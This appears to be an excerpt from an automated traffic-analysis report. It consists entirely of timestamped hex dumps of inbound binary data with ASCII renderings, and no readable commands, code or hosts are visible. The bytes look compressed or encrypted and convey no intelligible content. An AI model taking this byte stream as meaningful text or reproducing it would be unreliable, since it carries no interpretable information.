                                                                                                                                                                                2021-11-11 11:26:50 UTC8778INData Raw: bb 3c 28 9e 32 38 f5 5f 10 d8 09 46 9d 44 16 0c 86 ac e4 c3 21 23 39 d6 32 00 45 fb 1e 2f d1 c1 49 3e e7 7a 14 d4 1b ea 16 06 85 d1 e4 ca 52 88 14 83 d8 1e 0d 82 b9 af 5e f6 80 32 c1 c9 12 41 c0 e0 38 71 ad de 76 01 9f 40 30 e6 d2 83 68 db 99 7c fc 7e b8 fc 82 7a 72 63 fc f0 00 67 48 59 ae 18 e9 91 fa 09 ca f9 55 c6 80 bd 59 16 3f 0b 7f 8e 11 10 72 2b 5b e1 28 24 00 7b 47 ee 6d 81 a7 5a 62 84 14 b3 fd e4 3e 77 66 3a 4a bc 30 06 7c 61 95 20 12 92 19 38 01 7a d4 db 37 c5 01 ce 4c 58 e6 d6 1c 64 2e a3 21 7a f5 45 8c 61 95 d8 01 0b 05 12 c3 25 fa 05 9b b1 9f 80 28 e9 10 2b c5 15 3d be c0 83 db 40 97 17 b9 9c 6a 06 73 14 43 a0 f7 a6 38 44 13 18 04 54 36 b4 d0 68 d3 bd 94 17 9a 01 4d b0 4c 4a 58 2b 40 84 db ba c8 d1 e4 27 2c 4d ff a3 b6 e3 ea 18 2a b2 1c b4 58
                                                                                                                                                                                Data Ascii: <(28_FD!#92E/I>zR^2A8qv@0h|~zrcgHYUY?r+[(${GmZb>wf:J0|a 8z7LXd.!zEa%(+=@jsC8DT6hMLJX+@',M*X
                                                                                                                                                                                2021-11-11 11:26:50 UTC8794INData Raw: c2 49 80 01 d8 92 71 b5 0c 93 cb cc 51 30 88 04 31 3a c9 df 5c 80 02 54 9c 7a be c2 05 8a 9e 62 bb 00 62 37 af a2 5f a3 f4 6d 09 a0 73 ba 4f a0 c2 a6 5e fb 7e 4d fa 66 01 28 80 7f af 12 ba 80 48 1f 11 cf 8b a0 21 31 02 d0 24 fc 46 2f 46 06 1d 79 64 2c 4e 98 2c 49 7a b6 1c aa 21 0c 20 75 48 7e 07 a0 90 32 25 c7 48 90 c8 c4 4c 88 ac 7b 3c 86 30 82 3a 4b 8a f8 42 78 b4 03 07 67 34 b5 c9 6a 10 6c 89 fc 38 09 0d 84 93 5e 29 61 e9 45 e0 88 e0 36 eb 6b 50 3e b7 67 24 eb fa 1e 02 d6 11 2c d4 64 9e 79 cb 16 2d 08 16 b0 f8 79 00 c6 ac 24 9b a8 4b e3 59 02 a0 55 e5 b2 2c d3 61 a8 1c 20 e4 dc 41 2a 6f b4 c6 6a 31 fe e4 15 31 03 e0 b2 0a 01 e1 2e d9 0c 15 90 70 84 60 06 1b f0 a0 14 17 1c 1f a8 04 27 90 8a aa 54 90 80 74 ba 31 66 24 34 10 4a f0 05 ae 39 d4 34 34 12 69
                                                                                                                                                                                Data Ascii: IqQ01:\Tzbb7_msO^~Mf(H!1$F/Fyd,N,Iz! uH~2%HL{<0:KBxg4jl8^)aE6kP>g$,dy-y$KYU,a A*oj11.p`'Tt1f$4J944i
                                                                                                                                                                                2021-11-11 11:26:50 UTC8810INData Raw: 13 17 e2 c4 d6 e8 68 43 e4 12 fd 36 fe b3 ac e1 84 ef c2 1e 25 a0 dd 72 a8 0c 11 d7 33 7d 60 37 09 27 ea b8 fe d6 46 43 20 9b 00 0c a4 a6 e1 33 60 22 82 00 df b0 64 8f 7b 1e 1d 91 0f 84 b9 5c 80 a9 78 40 9a 63 2e 03 44 a3 dc 5b b6 3c 09 8c 76 08 0a 5d 89 8c dd f9 a0 48 b8 40 25 b1 f9 39 99 e0 00 f3 a0 50 e9 70 94 70 06 76 61 31 62 a3 d4 b9 4d 7e ec b0 98 44 8c 4b c2 3c 4a ae 73 d7 f2 9e 3e 29 38 93 2f 90 f1 f4 f2 5d 7c ef 59 bf 6b e3 68 20 b8 7f 78 01 30 c7 09 ae ac 45 2f 6e 01 30 56 6d 83 d2 01 67 71 2a 27 bb 2b 98 4c 3e 61 8b ed cc 59 53 25 1b 5c 41 31 b1 ec 95 e1 0c b3 f8 c2 85 48 c4 01 a2 d5 02 1a 58 11 cc 41 4c 8a 61 3f e4 18 41 4c 46 60 99 18 e6 12 01 e0 ca 6f a7 13 69 79 b4 a0 aa 9b 0a c5 49 78 ce 80 00 d4 e0 9c 90 da 8c 60 7a 15 34 a4 5f 56 3f 4a
                                                                                                                                                                                Data Ascii: hC6%r3}`7'FC 3`"d{\x@c.D[<v]H@%9Pppva1bM~DK<Js>)8/]|Ykh x0E/n0Vmgq*'+L>aYS%\A1HXALa?ALF`oiyIx`z4_V?J
                                                                                                                                                                                2021-11-11 11:26:50 UTC8826INData Raw: ba 81 69 8a 20 40 0c ca db 41 f3 83 cc c3 42 ed a4 b8 88 7f 1a 00 49 a0 d6 83 10 81 02 34 28 5c ac d8 34 d8 65 98 86 12 78 28 bf ec d4 3c e8 a2 02 2f ea d8 6b a9 74 62 8d 4d b7 20 2a e1 5d 2c 9e a0 52 f1 a3 91 22 93 72 c7 0e 89 54 2f d3 e4 72 c5 fd d8 62 be 49 50 cf df 20 c6 01 18 9a 75 0f 25 f6 db 62 0d 99 09 f5 09 d8 65 bf 18 0b 20 1e 00 03 29 ec a5 21 7e b8 97 f9 6c 99 18 6a f6 62 93 9f 95 5e 15 60 10 bc 09 31 0c dc 36 cf 05 36 7c 95 60 43 6b a0 e4 7f 61 d1 8c 82 a1 1c 80 9c d6 b8 0e 4a ef 22 16 7b 83 d5 b8 23 02 2f 04 cb 0d 02 e0 76 d3 08 60 34 0c 81 61 5a e0 0c ba d2 cb e5 2c 9c 00 39 dd 4a a0 ae 13 43 99 95 63 73 b0 b3 cd fd 07 52 b9 84 26 c4 32 65 53 5a 52 31 29 0b b8 91 02 ec 2a d4 0c eb 48 46 01 21 c5 22 e8 a3 0c 75 64 fc ed 10 eb 18 0d 4b 28 28
                                                                                                                                                                                Data Ascii: i @ABI4(\4ex(</ktbM *],R"rT/rbIP u%be )!~ljb^`166|`CkaJ"{#/v`4aZ,9JCcsR&2eSZR1)*HF!"udK((
                                                                                                                                                                                2021-11-11 11:26:50 UTC8842INData Raw: bf bc 1d ad 7c 55 a2 50 7d 45 1b e9 79 26 e0 68 84 c2 7a 4a 1e a7 37 93 fb 9a 2b 4f e8 0c 02 c1 01 5e 66 05 f2 89 07 0d dd a9 df 6d 50 a8 08 fa 7f 00 35 53 9e ef 5f c1 e0 06 f0 82 ee b2 07 73 89 c3 58 4b c7 e3 ca c1 03 fa 75 a5 5b 3c 12 03 87 f3 d4 b1 33 9b 7d 09 f3 51 12 68 92 25 de 90 fa 77 e2 2f ee 78 97 46 2e 17 e9 b7 e6 17 8c 85 86 e3 7e 9d a2 21 cb 51 12 2b fb cb 94 38 3f 88 c1 a4 fe af 0b b4 dd 47 4c 86 49 06 88 16 98 80 48 08 90 2f c1 60 9e 75 6a 25 9a 17 c8 b0 bd 0e 95 22 50 b7 cf 5e 98 67 fb 52 34 f4 62 92 40 86 96 39 c0 38 85 1c 6c 3a 4a 77 5d 7a 83 4f 1d d3 a2 46 8e 78 51 08 4d 60 2f bf b5 82 85 c6 89 75 cb e9 e3 41 81 18 f3 2c 70 c0 af 9c 57 73 26 30 29 ff 55 fe 9e 08 00 e1 b8 54 5a 6f 88 92 59 18 ac dc a3 78 d9 03 07 69 04 2c f8 10 3a b1 3e
                                                                                                                                                                                Data Ascii: |UP}Ey&hzJ7+O^fmP5S_sXKu[<3}Qh%w/xF.~!Q+8?GLIH/`uj%"P^gR4b@98l:Jw]zOFxQM`/uA,pWs&0)UTZoYxi,:>
                                                                                                                                                                                2021-11-11 11:26:50 UTC8858INData Raw: 18 43 e1 7e 0d 08 4c 17 cc 80 3b 38 b1 78 67 2c cf 4c 86 67 74 86 fe f9 21 6d 9b 00 c5 31 e9 47 b5 0a e7 6f e0 16 61 be 2a 25 fc da 62 ee 9b c8 cc 6d a9 5b a6 c8 aa 50 81 28 ea 5d a0 f5 20 22 4f 09 29 fe 5f 88 0a 87 44 78 02 e9 cd ab 0d 5d 7e 4e 4b 30 14 1a 8a 0b 1b 52 f2 f4 80 12 ea c3 0e 21 a4 12 02 d4 78 80 4b 9c 1c 80 e8 49 0b 6d 0f 35 c5 27 88 fe 17 12 b8 a4 a6 40 09 90 12 2c c2 c8 a2 f4 f5 5e e5 80 3a 48 30 6e 00 df 66 09 c7 14 82 3a 5a 60 41 c8 a6 2a c5 e6 b9 0c 0a 1f 65 84 09 a4 f3 e8 00 5a 60 a3 36 a4 f8 20 12 e4 5b f4 68 3d 60 21 68 1d ab fa 44 19 66 37 0f 15 9e 2a bb 49 76 17 09 2b 7d 10 54 68 85 13 6e 8c 69 56 9e bb de 01 48 3b 8b 53 d7 65 79 e9 11 09 56 30 b5 4f 16 36 21 1d a3 26 4e ec 01 a2 b0 23 f3 a4 bb b4 16 51 50 8b ee df 30 60 18 85 3e
                                                                                                                                                                                Data Ascii: C~L;8xg,Lgt!m1Goa*%bm[P(] "O)_Dx]~NK0R!xKIm5'@,^:H0nf:Z`A*eZ`6 [h=`!hDf7*Iv+}ThniVH;SeyV0O6!&N#QP0`>
                                                                                                                                                                                2021-11-11 11:26:50 UTC8870INData Raw: 0b 9d 95 e0 d0 97 28 40 c6 68 03 c4 5b 9e f6 7b 9b a2 5c d0 e3 50 68 6e 7a 62 5e a8 67 1c 44 52 00 e4 69 10 ae e8 ba 53 e6 c6 e4 73 16 78 f4 2e 31 9b db 14 3d 24 c2 7c e9 c0 37 d5 fe b3 5f f8 9e fd 84 76 f2 60 cd ad f8 85 8c 0f 0c bc e4 02 92 b0 38 7b 1a 2a 48 40 82 9c c0 d0 16 02 ca 74 13 19 25 96 f3 1e 2b 33 00 d8 08 f5 03 b1 86 0c d2 11 e0 61 16 cb 69 44 91 f1 9c 50 36 a8 05 e2 02 c6 12 a1 64 6a ac 3e a0 68 be 8c 25 a5 16 d9 ff e9 57 db 5c b0 43 46 a6 2d e1 6f bd aa 05 58 7c cd 7e bf a0 4b c1 61 5b 13 01 c8 59 6e b6 95 26 d0 f0 c9 7f 66 1d 09 68 84 75 77 77 91 f3 34 7f ac ab b9 3a ef 3d fb 6b ce 0c 0b aa 7b b7 02 22 f1 ae 80 06 c6 d5 18 c7 fc 01 7e ce 50 ee 08 59 9d f7 15 be 90 2c 27 5d fe 98 f2 dd c6 c8 00 50 b8 56 2f ee 6a 05 fb 3b 26 3b 80 c1 e0 02
                                                                                                                                                                                Data Ascii: (@h[{\Phnzb^gDRiSsx.1=$|7_v`8{*H@t%+3aiDP6dj>h%W\CF-oX|~Ka[Yn&fhuww4:=k{"~PY,']PV/j;&;
                                                                                                                                                                                2021-11-11 11:26:50 UTC8886INData Raw: 0f 00 91 78 5f a4 f1 57 af 60 08 6a 3e 7f b8 49 97 dc 22 82 19 c8 45 e4 7f 66 d8 c6 18 1d ca 26 0c ba 96 3a 6a 20 c9 02 9a 86 02 a6 ed 49 7e b8 02 63 dd a8 99 80 82 5c 1a 71 56 e2 e3 07 57 a3 7f da 94 ec 3c 22 bf d1 93 3a a0 81 09 01 02 7c 66 24 9a c8 fb 5e 97 01 55 37 c0 1a ed 89 84 f4 e7 7d 78 72 0c 77 e1 fc 90 34 a1 12 c5 6c 88 00 10 78 6b ab 1b 8b 24 f3 0e 35 80 a1 e0 cd d3 16 9a 28 7c fb 40 00 5c 78 34 b5 a2 9b 88 e0 a8 d6 ac 4e 13 6a f2 20 e4 30 a6 38 77 15 18 bc e2 70 26 36 02 94 92 0d 78 9c 57 ff f1 39 e9 5d e7 51 4b 5d 9c 05 95 53 35 25 ea 37 d6 4f e2 fe e4 85 db 50 ff 2e f0 4b ae 98 73 68 0b 44 a2 62 17 7f 21 19 75 a0 78 c7 02 67 be 8c 66 c9 64 5f d1 d7 c9 77 73 76 00 40 90 7e 3e 25 fa 0b d0 ee 7a c1 0e 75 67 e8 07 fe 21 2d 0e a4 9b 2e ef 2f 88
                                                                                                                                                                                Data Ascii: x_W`j>I"Ef&:j I~c\qVW<":|f$^U7}xrw4lxk$5(|@\x4Nj 08wp&6xW9]QK]S5%7OP.KshDb!uxgfd_wsv@~>%zug!-./
                                                                                                                                                                                2021-11-11 11:26:50 UTC8902INData Raw: 6f a7 19 16 69 16 fc 14 62 f9 c2 01 f8 33 38 92 d6 fe cb 06 94 1f 5c b0 0b 48 00 ee 94 f3 37 64 28 99 d1 7e b2 0c 10 92 93 af 20 b6 25 29 ab 64 bd 49 ed d8 19 6e 4c 4d a2 62 05 17 35 03 22 da 52 f6 85 1b 19 21 17 14 fc dd f2 f7 2f 17 18 e3 09 b8 0c 5d 7d a7 fc 60 d0 17 3a a2 4e e8 cb c1 b2 63 71 26 eb 00 25 c9 3c 4b fa ea 5e e7 01 c7 6f d0 90 80 93 fd 80 20 50 25 2c 0d 63 2a 90 98 5e 3b c0 f5 ac 34 4f 39 48 7f 19 9c d7 c9 5f 41 54 59 0f 41 4e a1 f4 92 21 db d7 b2 45 59 00 64 ad 26 9e 7e fd 4c f6 82 81 12 82 b5 a1 81 51 40 e3 33 32 5a 41 10 8a f8 2a d3 e9 20 22 15 30 90 94 00 ec a2 42 8d da b4 cf 17 b1 56 02 df 11 d8 6f 44 aa 25 0d 31 c6 4d 79 35 84 0c 3f f7 8c 86 f0 2a 00 1f b0 22 a0 b3 53 c3 95 7c 9c c0 29 0a 43 61 2f 51 5c 17 f4 01 c1 be 56 72 ed 9f 80
                                                                                                                                                                                Data Ascii: oib38\H7d(~ %)dInLMb5"R!/]}`:Ncq&%<K^o P%,c*^;4O9H_ATYAN!EYd&~LQ@32ZA* "0BVoD%1My5?*"S|)Ca/Q\Vr
                                                                                                                                                                                2021-11-11 11:26:50 UTC8918INData Raw: dc 6b 5e f6 f1 13 89 6c fa 12 7d e0 be 43 ae 22 72 4b 13 2d 22 03 03 aa eb f8 d6 16 c9 80 43 8a 00 c9 32 d0 6e 9e 00 d8 ec f5 10 38 75 04 bc cf 0d 24 70 c8 8d 1e f5 f6 d5 04 6a f9 07 8b 12 10 38 46 c6 b1 58 00 dd 44 6c 7d 05 a0 00 b7 76 52 b3 7b fe b4 ba ea 1a 0a 70 ef 90 d9 28 0c 8b d5 88 7a 16 01 50 3b 21 b4 40 a2 95 6c 0a c6 00 1a 4e 45 3b 54 48 2d 12 39 e1 d4 20 54 8a 19 ae 60 ed 28 5a 48 50 33 13 4a 70 0b ff 06 c5 2d b8 1c 01 25 a1 58 d9 19 fc 1b c9 ef 20 c1 62 60 14 3d 63 17 12 b7 49 8c 3c 2d ee 70 1b 5b 28 c7 66 d6 01 fd 24 03 48 0e 89 b6 af de 2c 83 4e 81 7c 49 3a 94 ac b8 8f 5e b8 82 19 dc 82 19 39 f2 e9 92 f1 69 68 18 4a 42 1c fb 95 7f db b9 7a 1d fc cb 1a 72 89 e2 d4 fe 25 5d 16 0a aa fc 7d f1 43 63 24 94 87 0f 51 dd af ff 1b 2b 5f cc b6 4a ca
                                                                                                                                                                                Data Ascii: k^l}C"rK-"C2n8u$pj8FXDl}vR{p(zP;!@lNE;TH-9 T`(ZHP3Jp-%X b`=cI<-p[(f$H,N|I:^9ihJBzr%]}Cc$Q+_J
                                                                                                                                                                                2021-11-11 11:26:50 UTC8934INData Raw: 9c a3 66 95 66 9e 05 7f de 33 13 1f a0 81 03 e9 bf 18 1e ab 0e ef 54 84 60 f7 5a fe 75 03 23 7b 14 0d 38 27 0c 34 61 42 3e 0d 67 00 a2 b8 84 e1 ad 69 b3 97 1d 48 5c ee 25 03 c6 c6 6d 06 a0 d7 55 a8 f3 34 3f 52 94 02 a7 93 d9 3c 6c 68 d4 61 60 02 42 62 7f 33 52 09 a0 c4 64 4b d7 13 2d 31 14 fd 83 04 fd a6 a3 43 0b 60 71 66 b4 f7 e8 3c 0e 0f 0b 6a 20 a5 02 54 3a 85 1f e0 0a 42 b4 f1 32 07 98 9c d7 8a 95 a1 76 90 0b 9f 83 49 13 37 44 f0 84 b6 ca 46 90 2a 08 c8 9e ba 60 62 f4 46 be c0 90 86 61 6d b5 0b 62 7a 28 88 20 5a 9c 17 46 c8 01 bf 8d 4a 32 9e 18 81 f4 28 dc 02 0a 05 6b 76 f9 44 00 8e 1f 80 8b 3f cb 70 e7 02 3a ca c5 bd 5e 81 54 c2 60 52 15 1a 18 30 c7 79 3c 06 aa a9 5f 98 30 f8 66 dc b9 10 25 f2 c7 04 f9 43 f7 70 aa 47 ea 68 2c 5f e9 5b a9 b0 7c e8 a5
                                                                                                                                                                                Data Ascii: ff3T`Zu#{8'4aB>giH\%mU4?R<lha`Bb3RdK-1C`qf<j T:B2vI7DF*`bFambz( ZFJ2(kvD?p:^T`R0y<_0f%CpGh,_[|
                                                                                                                                                                                2021-11-11 11:26:50 UTC8950INData Raw: 3c d0 44 13 da 36 81 b0 e8 7f 75 03 96 44 00 62 e9 c0 11 39 ca 18 b7 73 34 19 0a 7f 28 75 0e 94 67 b2 8f 45 d2 06 a1 cc 74 4b 88 c1 fc 8a eb 3f 47 dc 45 46 76 37 a4 00 19 86 70 e4 25 d4 bd de 0b 99 68 d2 0a 59 94 02 ec 6f 8e fd 49 04 d8 24 f2 1f 37 bb 06 e9 e0 b8 40 48 f2 0b 63 19 81 e1 e4 78 79 e3 09 b5 94 46 b4 01 26 6e 03 91 cc 86 7c b7 e6 3c ac ec c0 7c 72 7b 05 7a 42 27 7d 01 55 9b dc df 9c 08 dc 6c b4 64 f8 9f 21 f9 2f 82 8a 87 1c 52 8b f1 10 2e 70 15 95 73 84 80 92 4a 4c 60 bc a7 84 20 5e 5d 63 fe 58 b6 ec 96 1c 3d 9a 8c 00 59 35 b7 3c 37 20 12 30 02 dc 4c 93 97 31 09 33 89 d2 fb 51 d2 05 f8 ee 55 e8 c0 2d 07 f3 b8 0a 8a 15 0c 0a e2 e4 ba 40 3f 98 33 7f 5a 31 d8 18 d4 4b 04 a4 80 84 00 d9 65 75 37 07 45 6f 71 2d b8 d0 e0 f4 b9 b4 00 2c 59 90 d4 80
                                                                                                                                                                                Data Ascii: <D6uDb9s4(ugEtK?GEFv7p%hYoI$7@HcxyF&n|<|r{zB'}Uld!/R.psJL` ^]cX=Y5<7 0L13QU-@?3Z1Keu7Eoq-,Y
                                                                                                                                                                                2021-11-11 11:26:50 UTC8966INData Raw: f8 bd bf 6a 10 cb cf b8 e6 50 3b 42 0e ee 8e 21 a0 64 6e eb a3 c1 06 f4 34 20 b2 9c 24 00 d6 96 06 33 71 f8 01 1d 0c 76 a8 66 28 98 79 02 f4 d3 1a 47 7c 5d 5d d6 82 60 e5 3b 15 26 30 38 50 84 58 c8 5e 52 bd 12 17 f4 2d 00 09 01 42 fa ff ef 2d bf 85 d9 a5 12 dc ba 21 c0 9a e0 88 14 29 ce 04 0d 03 0f c0 0c e3 da 77 9d 22 0a 36 bf 57 a5 59 80 af b4 58 74 40 e5 57 4e bb a4 56 b3 5f b0 ab 61 29 f6 34 7a 97 86 60 e7 0e 84 de 00 1c 4b 1f d7 2e 7c bc 43 13 6b a6 e9 fb cc ac 0d 0c 94 12 b0 46 8c 7f 25 81 84 76 ca c0 27 dc e3 7e 4e af 82 74 1c 85 88 72 ec 74 5a 38 d7 f8 13 89 f5 ff ba 99 b6 8b 34 32 df 75 4d aa 20 08 12 30 57 ff ae e7 f5 64 08 bc ec 95 05 45 01 b8 af 60 88 9f 66 60 2d c4 a6 58 af 00 b5 52 1d 88 b2 c8 63 82 fc ce 5f be 80 f6 71 5b 36 1c 04 b6 aa f8
                                                                                                                                                                                Data Ascii: jP;B!dn4 $3qvf(yG|]]`;&08PX^R-B-!)w"6WYXt@WNV_a)4z`K.|CkF%v'~NtrtZ842uM 0WdE`f`-XRc_q[6
                                                                                                                                                                                2021-11-11 11:26:50 UTC8982INData Raw: 65 32 c9 9b ec 13 c0 14 67 08 3e eb 64 00 86 51 dc ed 1d e3 5d 03 0b 7f 0e f5 2f f0 a0 12 08 43 68 41 4b 34 ca 51 62 b1 94 60 1c c7 01 bb 4e d4 b7 6a 51 d0 fc 06 f5 c8 b3 b6 1f 56 02 d3 6d 49 ac 54 45 05 20 e7 15 20 12 98 54 ed 18 62 ae 55 58 d5 6f 03 31 eb b0 da 88 22 00 36 4f a0 02 6e d1 ba 24 2f 8e bf 81 f0 5e a7 c4 3a 00 09 5a b5 e5 ac aa 07 26 62 7f 6a 4c 5a 86 89 bb 01 b0 61 25 02 15 0a 0b 18 8c 05 ec be 7d 97 20 12 e6 14 23 26 7e 36 9f 80 03 21 1d 9c 04 e4 02 c9 c2 2a 5a 54 66 d5 30 1a 77 80 95 5a 7e b7 7b f6 c4 34 ba fc 22 b5 ff b6 c2 27 c2 44 32 f9 3e e9 08 d8 ac 68 d7 0c ee 49 ec 02 7c 12 16 d6 7f 6c f3 14 00 99 08 8c 26 17 ce fc 06 ff e6 69 29 9d 1c 2d f2 10 22 b0 93 7c fa 82 13 e5 70 18 c8 62 c6 27 01 81 dd 66 84 12 79 56 30 aa e7 c8 70 88 f0
                                                                                                                                                                                Data Ascii: e2g>dQ]/ChAK4Qb`NjQVmITE TbUXo1"6On$/^:Z&bjLZa%} #&~6!*ZTf0wZ~{4"'D2>hI|l&i)-"|pb'fyV0p
                                                                                                                                                                                2021-11-11 11:26:50 UTC8998INData Raw: 28 a0 b2 a2 d1 6d 1d 39 83 86 9b 1f 1c d0 7a e1 42 e0 fb 0a b4 5d 35 6d e4 43 20 d2 74 0c 52 8d e4 14 22 08 38 15 07 7c 90 2e a7 e8 48 b6 02 ce 26 12 3a 00 5c 74 14 22 28 61 de d4 20 70 3c 18 b1 15 bc c1 45 f7 00 f4 19 6e 76 b4 88 53 99 5e d6 80 e6 55 8e d2 00 5f f3 d5 fc bb 95 ce 27 00 e0 9b ed 9c 65 4c a5 7e 60 c2 5c f1 4e 77 1b 00 74 a9 20 5d 23 17 fa 56 c0 48 2e 87 bd 70 15 04 b7 de 25 6d 26 b5 79 20 68 22 65 5a ec 3a ef b4 d4 b3 bd e0 a5 d2 c0 94 cf 8c 20 a1 20 ec e2 d8 48 7d 16 82 d3 0f 7a 55 d2 08 94 bd 83 dc 10 82 86 87 09 57 f3 f8 30 3c 92 8d 71 94 92 02 dd bc 38 c1 82 8a 01 b8 68 39 a7 13 5e ae c0 b3 1d 60 03 61 11 22 77 7a 65 00 66 57 01 5b 82 40 bc c3 36 8d 7c 6b 5c 25 22 87 fe b1 70 96 b9 8e 1e 50 d9 dc ea bc a6 2f 66 28 00 dd 37 d0 71 09 95
                                                                                                                                                                                Data Ascii: (m9zB]5mC tR"8|.H&:\t"(a p<EnvS^U_'eL~`\Nwt ]#VH.p%m&y h"eZ: H}zUW0<q8h9^`a"wzefW[@6|k\%"pP/f(7q
                                                                                                                                                                                2021-11-11 11:26:50 UTC9014INData Raw: 2c eb 43 4e 8d e0 84 5a 67 6b c8 e0 a1 2c 0f d4 78 ed 0b 53 fc 2d d0 d2 4b 88 0e 93 2e 0b 41 89 31 7d 81 8c ca 7c ff 2e 98 a4 b2 09 5e 13 0a 74 c1 21 df c4 c3 f2 a4 12 04 02 1e f7 0f 54 bb 00 f9 7d 55 97 b5 af 52 99 96 7a 03 ae 5c 0f 53 36 d7 00 d1 75 48 97 b3 c3 e9 f6 38 4a 0c 62 0c 59 ca 00 8f 24 04 20 a3 bc d0 b5 4c 70 4f 34 8a 5c 17 78 71 f2 ef 26 d0 d1 a7 7e 60 42 bc 59 64 d3 08 76 a0 6f 2a 2c bd 31 14 78 52 82 2c d2 a9 4e 3e c0 40 03 fb 00 42 4b b9 70 e4 75 dd 55 b3 d7 01 f5 63 3e 24 f3 3f 01 76 f2 ec 85 f8 66 fb 78 06 e9 2a 29 b4 17 24 03 26 0b c8 7f 64 a3 b0 43 7c 47 92 55 9d 7e c4 5b 2d 08 36 44 2a 28 f0 3a 9c 0b 48 a0 39 1c 46 89 2d 38 32 c8 4c 8a 1f 83 18 e4 e6 16 20 30 45 b1 f1 16 e2 b8 9b 86 25 e7 20 2c dd a1 6f 42 cd 1a 83 64 ed b6 25 20 e2
                                                                                                                                                                                Data Ascii: ,CNZgk,xS-K.A1}|.^t!T}URz\S6uH8JbY$ LpO4\xq&~`BYdvo*,1xR,N>@BKpuUc>$?vfx*)$&dC|GU~[-6D*(:H9F-82L 0E% ,oBd%
                                                                                                                                                                                2021-11-11 11:26:50 UTC9030INData Raw: e5 46 d0 0c 2f 8c 61 de 9c 66 88 11 c5 34 35 c1 88 ca c2 10 1d cd 67 01 25 71 73 9e 4c 50 21 c8 80 14 77 4e b6 02 72 dc 05 59 b0 eb 61 bb 41 b8 4a c5 7c 54 00 8e 29 b4 00 a8 41 e6 31 98 90 80 7a c5 1d e0 b2 fe 8b d2 5b a3 8b 09 5b 12 7a f9 62 02 e6 fa 20 bd 82 86 55 61 01 cf fb b5 ee 7f 66 07 03 c9 3f d1 0b d8 60 32 64 05 2d b4 61 e9 c5 36 16 01 fb 60 db 06 b0 34 e0 19 27 4b e7 e0 80 ff 80 6c 56 09 f0 db 80 09 05 88 f2 e0 0f 3c ea c4 06 21 e3 50 76 2d 2c 81 ff 84 71 ed 3a e9 84 30 44 c1 52 cd 39 00 03 b2 58 76 93 50 b5 01 02 e4 79 d4 e0 1a 2d 7c 70 02 16 48 9c 3b 7c bc 89 02 03 10 da 15 07 4f 4d c1 26 b7 32 c0 22 83 4a 3e 41 90 24 73 86 39 72 a6 25 f6 60 78 55 7a d3 84 05 3c 85 16 a3 fe 12 a7 f9 20 8a a9 2d d6 27 86 32 00 94 7f b0 01 41 00 f8 c0 fa b8 8e
                                                                                                                                                                                Data Ascii: F/af45g%qsLP!wNrYaAJ|T)A1z[[zb Uaf?`2d-a6`4'KlV<!Pv-,q:0DR9XvPy-|pH;|OM&2"J>A$s9r%`xUz< -'2A
                                                                                                                                                                                2021-11-11 11:26:50 UTC9046INData Raw: db 35 8d 26 6a 75 28 12 2e b0 fc c6 17 e6 ed 4e 20 8c 06 1d 20 0f 9d fa ff 23 d2 ac 9d 4b 63 e9 5e a9 f5 f8 ad 60 77 3f 61 0e 59 96 1c 21 c0 30 de 38 b5 00 fe e6 a5 05 8f 0c c3 33 02 ce 39 cf 8b 27 6d fd 18 03 9d f2 eb 10 e0 22 2a 9f 01 71 79 7e 02 11 cf b0 8c 7c 5b 59 78 3b 05 14 c7 7c aa b5 ad b8 40 b8 9a 00 20 0d 03 c0 74 26 c3 7d 10 25 da 65 1c a1 f7 2a 6e 38 e0 01 44 5b 04 fb 05 7a 7b 20 f4 ee 0b 7e 3f bd 91 82 67 de 7a f1 04 1a 90 47 3a bf fa 1c 10 d8 3c 18 bc 4c f8 79 00 8d d6 fd bd 10 36 05 1b 04 ca 2e 4a 40 82 ef 88 35 7f 41 18 d0 04 fa 05 f1 12 1d 1b 99 0f 40 6e b6 ae 80 34 ec 10 fa 12 b6 1f 25 06 04 2f b7 70 02 74 5a 77 1c de ab c0 44 e4 a0 c6 40 ef c1 20 01 a2 b5 bb 84 07 f9 16 f9 c4 10 ad d8 49 03 b7 1d 41 99 c3 34 89 e1 c9 e5 42 80 38 8f 78
                                                                                                                                                                                Data Ascii: 5&ju(.N #Kc^`w?aY!0839'm"*qy~|[Yx;|@ t&}%e*n8D[z{ ~?gzG:<Ly6.J@5A@n4%/ptZwD@ IA4B8x
                                                                                                                                                                                2021-11-11 11:26:50 UTC9062INData Raw: c5 3d e9 7f bc 14 95 74 df 5c 9d db 37 a6 25 e9 56 0b 5e 26 56 30 b8 09 6a ee b0 7a ca 1e 31 4a 1f 10 8c ef 39 16 00 c5 73 0e 47 06 9d 51 48 f4 a2 89 1e 7d d9 d2 84 6b 43 1c 94 90 fd 44 d4 3c 12 a0 4d 00 20 6e f7 eb 8a 38 5c 01 a7 06 77 2d 34 41 1c 01 a5 d6 1d 3c ac fe 7f 7b 80 c0 74 66 d2 60 2d 58 ca 5c 5f bd 0b d1 e9 98 54 c4 a1 90 b0 e0 c8 60 41 28 64 4f f7 37 04 56 cb 1e f0 01 45 74 31 ba b5 06 23 84 04 7d a4 3e a0 b5 7e ea 54 f0 d3 c5 a7 60 82 ec be ff 1e 90 d8 91 97 3a b8 46 22 80 0c 69 a3 17 29 aa 9a 18 6d ad 19 52 30 5f 20 7d b9 18 73 6e be 30 78 e6 00 ab 1f c3 fc ea 26 a7 85 01 a0 d2 09 75 43 5e 5a 6e b1 70 82 42 6f 33 98 cf 02 67 99 25 85 fe b4 0c 1c 25 d5 bf 40 2b 1d d6 60 97 22 f4 53 36 15 79 30 1e 90 80 a4 f0 44 19 18 7b 18 3c 21 e3 18 da e1
                                                                                                                                                                                Data Ascii: =t\7%V^&V0jz1J9sGQH}kCD<M n8\w-4A<{tf`-X\_T`A(dO7VEt1#}>~T`:F"i)mR0_ }sn0x&uC^ZnpBo3g%%@+`"S6y0D{<!
